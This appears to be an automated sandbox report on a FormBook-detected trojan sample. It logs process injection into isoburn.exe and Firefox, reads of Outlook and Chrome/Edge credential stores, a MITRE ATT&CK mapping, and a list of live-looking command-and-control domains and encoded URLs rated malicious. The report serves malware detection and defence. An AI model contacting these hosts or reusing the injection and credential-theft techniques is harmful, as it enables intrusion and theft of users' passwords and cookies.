            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FCA38 mov eax, dword ptr fs:[00000030h]3_2_017FCA38
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E4A35 mov eax, dword ptr fs:[00000030h]3_2_017E4A35
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E4A35 mov eax, dword ptr fs:[00000030h]3_2_017E4A35
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01816ACC mov eax, dword ptr fs:[00000030h]3_2_01816ACC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01816ACC mov eax, dword ptr fs:[00000030h]3_2_01816ACC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01816ACC mov eax, dword ptr fs:[00000030h]3_2_01816ACC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EEA2E mov eax, dword ptr fs:[00000030h]3_2_017EEA2E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FCA24 mov eax, dword ptr fs:[00000030h]3_2_017FCA24
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FAAEE mov eax, dword ptr fs:[00000030h]3_2_017FAAEE
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FAAEE mov eax, dword ptr fs:[00000030h]3_2_017FAAEE
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184CA11 mov eax, dword ptr fs:[00000030h]3_2_0184CA11
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0AD0 mov eax, dword ptr fs:[00000030h]3_2_017C0AD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F4AD0 mov eax, dword ptr fs:[00000030h]3_2_017F4AD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F4AD0 mov eax, dword ptr fs:[00000030h]3_2_017F4AD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8AA0 mov eax, dword ptr fs:[00000030h]3_2_017C8AA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8AA0 mov eax, dword ptr fs:[00000030h]3_2_017C8AA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F8A90 mov edx, dword ptr fs:[00000030h]3_2_017F8A90
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183CA72 mov eax, dword ptr fs:[00000030h]3_2_0183CA72
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183CA72 mov eax, dword ptr fs:[00000030h]3_2_0183CA72
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01894DAD mov eax, dword ptr fs:[00000030h]3_2_01894DAD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8D59 mov eax, dword ptr fs:[00000030h]3_2_017C8D59
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8D59 mov eax, dword ptr fs:[00000030h]3_2_017C8D59
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8D59 mov eax, dword ptr fs:[00000030h]3_2_017C8D59
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8D59 mov eax, dword ptr fs:[00000030h]3_2_017C8D59
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8D59 mov eax, dword ptr fs:[00000030h]3_2_017C8D59
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0D59 mov eax, dword ptr fs:[00000030h]3_2_017C0D59
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0D59 mov eax, dword ptr fs:[00000030h]3_2_017C0D59
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0D59 mov eax, dword ptr fs:[00000030h]3_2_017C0D59
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01888DAE mov eax, dword ptr fs:[00000030h]3_2_01888DAE
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01888DAE mov eax, dword ptr fs:[00000030h]3_2_01888DAE
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01844DD7 mov eax, dword ptr fs:[00000030h]3_2_01844DD7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01844DD7 mov eax, dword ptr fs:[00000030h]3_2_01844DD7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F4D1D mov eax, dword ptr fs:[00000030h]3_2_017F4D1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B6D10 mov eax, dword ptr fs:[00000030h]3_2_017B6D10
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B6D10 mov eax, dword ptr fs:[00000030h]3_2_017B6D10
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B6D10 mov eax, dword ptr fs:[00000030h]3_2_017B6D10
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01860DF0 mov eax, dword ptr fs:[00000030h]3_2_01860DF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01860DF0 mov eax, dword ptr fs:[00000030h]3_2_01860DF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DAD00 mov eax, dword ptr fs:[00000030h]3_2_017DAD00
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DAD00 mov eax, dword ptr fs:[00000030h]3_2_017DAD00
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DAD00 mov eax, dword ptr fs:[00000030h]3_2_017DAD00
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B6DF6 mov eax, dword ptr fs:[00000030h]3_2_017B6DF6
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017ECDF0 mov eax, dword ptr fs:[00000030h]3_2_017ECDF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017ECDF0 mov ecx, dword ptr fs:[00000030h]3_2_017ECDF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BCDEA mov eax, dword ptr fs:[00000030h]3_2_017BCDEA
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BCDEA mov eax, dword ptr fs:[00000030h]3_2_017BCDEA
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01878D10 mov eax, dword ptr fs:[00000030h]3_2_01878D10
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01878D10 mov eax, dword ptr fs:[00000030h]3_2_01878D10
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CADE0 mov eax, dword ptr fs:[00000030h]3_2_017CADE0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CADE0 mov eax, dword ptr fs:[00000030h]3_2_017CADE0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CADE0 mov eax, dword ptr fs:[00000030h]3_2_017CADE0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_004173F3 LdrLoadDll,3_2_004173F3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeSection loaded: unknown target: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeSection loaded: unknown target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\isoburn.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF79F9E0000Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeMemory written: C:\Users\user\Desktop\PO_CCTEB77.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF79F9E0000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\isoburn.exeThread APC queued: target process: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exeJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess created: C:\Users\user\Desktop\PO_CCTEB77.exe C:\Users\user\Desktop\PO_CCTEB77.exeJump to behavior
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exeProcess created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000000.2078010850.0000000001661000.00000002.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474698783.0000000001661000.00000002.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000000.2209411834.00000000013F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000000.2078010850.0000000001661000.00000002.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474698783.0000000001661000.00000002.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000000.2209411834.00000000013F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000000.2078010850.0000000001661000.00000002.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474698783.0000000001661000.00000002.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000000.2209411834.00000000013F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000000.2078010850.0000000001661000.00000002.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474698783.0000000001661000.00000002.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000000.2209411834.00000000013F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeQueries volume information: C:\Users\user\Desktop\PO_CCTEB77.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO_CCTEB77.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO_CCTEB77.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO_CCTEB77.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO_CCTEB77.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid AccountsWindows Management InstrumentationPath Interception412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		Exfiltration Over Bluetooth3
            Ingress Tool Transfer            		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration4
            Non-Application Layer Protocol            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureTraffic Duplication4
            Application Layer Protocol            		Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO_CCTEB77.exe70%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            PO_CCTEB77.exe67%VirustotalBrowse
            PO_CCTEB77.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.makeinai.online3%VirustotalBrowse
            www.nesmalt.info2%VirustotalBrowse
            www.611erhm.top12%VirustotalBrowse
            fam-scharf.net9%VirustotalBrowse
            instantconvey.com6%VirustotalBrowse
            altralogos.com17%VirustotalBrowse
            wrautomotive.online8%VirustotalBrowse
            www.jones4deepriver.com0%VirustotalBrowse
            natroredirect.natrocdn.com2%VirustotalBrowse
            thecoloringbitch.com13%VirustotalBrowse
            www.poria.link0%VirustotalBrowse
            alldaysslimmingstea.com13%VirustotalBrowse
            www.magmadokum.com1%VirustotalBrowse
            www.77moea.top10%VirustotalBrowse
            www.domainappraisalbot.com1%VirustotalBrowse
            www.wrautomotive.online1%VirustotalBrowse
            www.alldaysslimmingstea.com0%VirustotalBrowse
            www.fam-scharf.net1%VirustotalBrowse
            www.thecoloringbitch.com8%VirustotalBrowse
            www.altralogos.com12%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://mozilla.org0/0%URL Reputationsafe
            http://www.domainappraisalbot.com/ahec/?KHcH=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JEVJR030KrPkQ==&Vjk=-N-tntX100%Avira URL Cloudmalware
            http://www.jones4deepriver.com/ahec/?KHcH=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBsblhtcQm5YDg==&Vjk=-N-tntX100%Avira URL Cloudmalware
            http://www.nesmalt.info/ahec/?Vjk=-N-tntX&KHcH=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRude7iecelPQFgCQ==100%Avira URL Cloudmalware
            http://www.fam-scharf.net/ahec/?Vjk=-N-tntX&KHcH=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUxaOpL3PpxqeQ==100%Avira URL Cloudmalware
            http://www.77moea.top/ahec/?Vjk=-N-tntX&KHcH=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy86ItGv6ERTYYg==100%Avira URL Cloudphishing
            http://www.poria.link/ahec/100%Avira URL Cloudmalware
            http://www.nesmalt.info/ahec/100%Avira URL Cloudmalware
            http://www.poria.link/ahec/3%VirustotalBrowse
            http://www.magmadokum.com/ahec/0%Avira URL Cloudsafe
            http://www.fam-scharf.net/ahec/100%Avira URL Cloudmalware
            http://www.77moea.top/ahec/100%Avira URL Cloudphishing
            http://www.makeinai.online/ahec/?KHcH=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0uXSPTvTu0ZjA==&Vjk=-N-tntX100%Avira URL Cloudmalware
            http://www.altralogos.com/ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfnRPtjbaXErcA==&Vjk=-N-tntX100%Avira URL Cloudmalware
            http://www.makeinai.online/ahec/100%Avira URL Cloudmalware
            http://www.thecoloringbitch.com/ahec/100%Avira URL Cloudmalware
            http://www.magmadokum.com/ahec/1%VirustotalBrowse
            http://www.fam-scharf.net/ahec/2%VirustotalBrowse
            http://cdn.jsinit.directfwd.com/sk-jspark_init.php100%Avira URL Cloudmalware
            https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckk0%Avira URL Cloudsafe
            http://www.wrautomotive.online/ahec/0%Avira URL Cloudsafe
            http://www.makeinai.online/ahec/2%VirustotalBrowse
            http://www.nesmalt.info/ahec/2%VirustotalBrowse
            http://www.magmadokum.com/ahec/?KHcH=AHFK2pjoxw5zzLKjgIeieoxyeFKGBXiFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMiJvE3/6rCIhWfjw==&Vjk=-N-tntX0%Avira URL Cloudsafe
            http://tempuri.org/Database1DataSet.xsd0%Avira URL Cloudsafe
            http://www.thecoloringbitch.com/ahec/8%VirustotalBrowse
            http://www.wrautomotive.online0%Avira URL Cloudsafe
            http://www.domainappraisalbot.com/ahec/100%Avira URL Cloudmalware
            http://www.thecoloringbitch.com/ahec/?Vjk=-N-tntX&KHcH=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA76IWuP2FlzTnw==100%Avira URL Cloudmalware
            http://tempuri.org/Database1DataSet.xsd1%VirustotalBrowse
            http://www.jones4deepriver.com/ahec/100%Avira URL Cloudmalware
            https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckk0%VirustotalBrowse
            http://cdn.jsinit.directfwd.com/sk-jspark_init.php13%VirustotalBrowse
            http://www.poria.link/ahec/?Vjk=-N-tntX&KHcH=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VjrVHIYZDWS5A==100%Avira URL Cloudmalware
            http://www.instantconvey.com/ahec/?Vjk=-N-tntX&KHcH=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClw6x6iQ2E33Xw==100%Avira URL Cloudmalware
            http://www.altralogos.com/ahec/100%Avira URL Cloudmalware
            http://www.instantconvey.com/ahec/100%Avira URL Cloudmalware
            http://www.alldaysslimmingstea.com/ahec/?Vjk=-N-tntX&KHcH=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVPoMkTtjkNnJA==100%Avira URL Cloudmalware
